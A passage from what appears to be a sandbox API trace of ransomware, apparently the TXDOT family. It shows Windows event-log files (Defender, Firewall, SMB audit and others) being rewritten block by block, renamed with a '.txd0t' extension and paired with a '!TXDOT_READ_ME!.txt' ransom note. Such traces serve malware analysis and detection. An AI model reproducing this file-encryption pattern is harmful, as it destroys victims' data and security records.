returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.txd0t" [0089.256] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.txd0t") returned 0 [0089.256] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.256] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x478 [0089.256] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.256] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.256] WriteFile (in: hFile=0x478, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.258] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.258] ReadFile (in: hFile=0x478, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11000, lpOverlapped=0x0) returned 1 [0089.261] SetFilePointerEx (in: hFile=0x478, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.261] WriteFile (in: hFile=0x478, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11000, lpOverlapped=0x0) returned 1 [0089.262] FlushFileBuffers (hFile=0x478) returned 1 [0089.270] GetProcessHeap () returned 0xe30000 [0089.270] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11e) returned 0xed7f88 [0089.270] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" [0089.270] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx") returned="Microsoft-Windows-SettingSync%4Operational.evtx" [0089.270] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.270] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.270] GetProcessHeap () returned 0xe30000 [0089.270] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.270] CloseHandle (hObject=0x478) returned 1 [0089.270] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SettingSync%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-settingsync%4operational.evtx.txd0t")) returned 1 [0089.271] SetEvent (hEvent=0x414) returned 1 [0089.271] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.274] StrCpyW (in: psz1=0x53ef7a0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" [0089.274] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t" [0089.274] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t") returned 0 [0089.274] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.274] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.274] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.274] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.274] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.275] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.275] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef760, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef760*=0x11000, lpOverlapped=0x0) returned 1 [0089.281] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.281] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef764, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef764*=0x11000, lpOverlapped=0x0) returned 1 [0089.281] FlushFileBuffers (hFile=0x460) returned 1 [0089.333] GetProcessHeap () returned 0xe30000 [0089.333] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xed7f88 [0089.333] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" [0089.333] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx") returned="Microsoft-Windows-Shell-Core%4Operational.evtx" [0089.333] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.333] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.333] GetProcessHeap () returned 0xe30000 [0089.333] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.333] CloseHandle (hObject=0x460) returned 1 [0089.333] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Shell-Core%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-shell-core%4operational.evtx.txd0t")) returned 1 [0089.334] SetEvent (hEvent=0x414) returned 1 [0089.334] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.337] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" [0089.337] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.txd0t" [0089.337] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.txd0t") returned 0 [0089.337] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx", dwFileAttributes=0x80) returned 1 [0089.337] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0089.338] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.338] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.338] WriteFile (in: hFile=0x474, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.339] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.339] ReadFile (in: hFile=0x474, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x11000, lpOverlapped=0x0) returned 1 [0089.344] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.344] WriteFile (in: hFile=0x474, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x11000, lpOverlapped=0x0) returned 1 [0089.344] FlushFileBuffers (hFile=0x474) returned 1 [0089.354] GetProcessHeap () returned 0xe30000 [0089.354] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed2be8 [0089.354] StrCpyW (in: psz1=0xed2be8, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" [0089.354] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx") returned="Microsoft-Windows-SMBServer%4Audit.evtx" [0089.354] StrCpyW (in: psz1=0xed2c00, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.354] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.354] GetProcessHeap () returned 0xe30000 [0089.354] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2be8 | out: hHeap=0xe30000) returned 1 [0089.354] CloseHandle (hObject=0x474) returned 1 [0089.354] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Audit.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-smbserver%4audit.evtx.txd0t")) returned 1 [0089.355] SetEvent (hEvent=0x414) returned 1 [0089.355] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.367] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" [0089.367] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.txd0t" [0089.367] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.txd0t") returned 0 [0089.367] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx", dwFileAttributes=0x80) returned 1 [0089.367] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.367] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.367] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.367] WriteFile (in: hFile=0x460, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.368] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.368] ReadFile (in: hFile=0x460, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x11000, lpOverlapped=0x0) returned 1 [0089.372] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.372] WriteFile (in: hFile=0x460, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x11000, lpOverlapped=0x0) returned 1 [0089.372] FlushFileBuffers (hFile=0x460) returned 1 [0089.491] GetProcessHeap () returned 0xe30000 [0089.491] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x114) returned 0xed1d98 [0089.491] StrCpyW (in: psz1=0xed1d98, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" [0089.491] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx") returned="Microsoft-Windows-SMBServer%4Security.evtx" [0089.491] StrCpyW (in: psz1=0xed1db0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.491] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.491] GetProcessHeap () returned 0xe30000 [0089.491] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1d98 | out: hHeap=0xe30000) returned 1 [0089.491] CloseHandle (hObject=0x460) returned 1 [0089.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-SMBServer%4Security.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-smbserver%4security.evtx.txd0t")) returned 1 [0089.491] SetEvent (hEvent=0x414) returned 1 [0089.492] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.499] StrCpyW (in: psz1=0x53ef790, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" [0089.500] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t" [0089.500] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t") returned 0 [0089.500] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx", dwFileAttributes=0x80) returned 1 [0089.500] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.501] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.501] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.501] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.502] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.502] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef750, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef750*=0x11000, lpOverlapped=0x0) returned 1 [0089.506] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.506] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef754, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef754*=0x11000, lpOverlapped=0x0) returned 1 [0089.506] FlushFileBuffers (hFile=0x464) returned 1 [0089.518] GetProcessHeap () returned 0xe30000 [0089.518] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x132) returned 0xed7f88 [0089.518] StrCpyW (in: psz1=0xed7f88, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" [0089.518] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned="Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" [0089.518] StrCpyW (in: psz1=0xed7fa0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.518] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.518] GetProcessHeap () returned 0xe30000 [0089.519] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed7f88 | out: hHeap=0xe30000) returned 1 [0089.519] CloseHandle (hObject=0x464) returned 1 [0089.519] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-volumesnapshot-driver%4operational.evtx.txd0t")) returned 1 [0089.522] SetEvent (hEvent=0x414) returned 1 [0089.522] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.527] StrCpyW (in: psz1=0x53ef7b0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" [0089.527] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t" [0089.527] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t") returned 0 [0089.527] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx", dwFileAttributes=0x80) returned 1 [0089.528] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x464 [0089.528] GetFileSizeEx (in: hFile=0x464, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=69632) returned 1 [0089.528] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.528] WriteFile (in: hFile=0x464, lpBuffer=0x53efa44*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x53efd5c, lpOverlapped=0x0 | out: lpBuffer=0x53efa44*, lpNumberOfBytesWritten=0x53efd5c*=0x200, lpOverlapped=0x0) returned 1 [0089.529] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffeee00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.529] ReadFile (in: hFile=0x464, lpBuffer=0x4aa0020, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x53ef770, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesRead=0x53ef770*=0x11000, lpOverlapped=0x0) returned 1 [0089.531] SetFilePointerEx (in: hFile=0x464, liDistanceToMove=0xfffef000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.532] WriteFile (in: hFile=0x464, lpBuffer=0x4aa0020*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x53ef774, lpOverlapped=0x0 | out: lpBuffer=0x4aa0020*, lpNumberOfBytesWritten=0x53ef774*=0x11000, lpOverlapped=0x0) returned 1 [0089.532] FlushFileBuffers (hFile=0x464) returned 1 [0089.536] GetProcessHeap () returned 0xe30000 [0089.536] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x118) returned 0xed1208 [0089.536] StrCpyW (in: psz1=0xed1208, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" [0089.536] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx") returned="Microsoft-Windows-Windows Defender%4WHC.evtx" [0089.536] StrCpyW (in: psz1=0xed1220, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.536] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.536] GetProcessHeap () returned 0xe30000 [0089.536] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1208 | out: hHeap=0xe30000) returned 1 [0089.536] CloseHandle (hObject=0x464) returned 1 [0089.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Defender%4WHC.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-windows defender%4whc.evtx.txd0t")) returned 1 [0089.537] SetEvent (hEvent=0x414) returned 1 [0089.537] WaitForSingleObject (hHandle=0x418, dwMilliseconds=0x3e8) returned 0x0 [0089.540] StrCpyW (in: psz1=0x53ef770, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" [0089.540] StrCatW (in: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t" [0089.540] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx.txd0t") returned 0 [0089.540] SetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx", dwFileAttributes=0x80) returned 1 [0089.544] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Windows Firewall With Advanced Security%4Firewall.evtx" (normalized: "c:\\logs\\microsoft-windows-windows firewall with advanced security%4firewall.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0089.544] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x53efd60 | out: lpFileSize=0x53efd60*=1052672) returned 1 [0089.544] 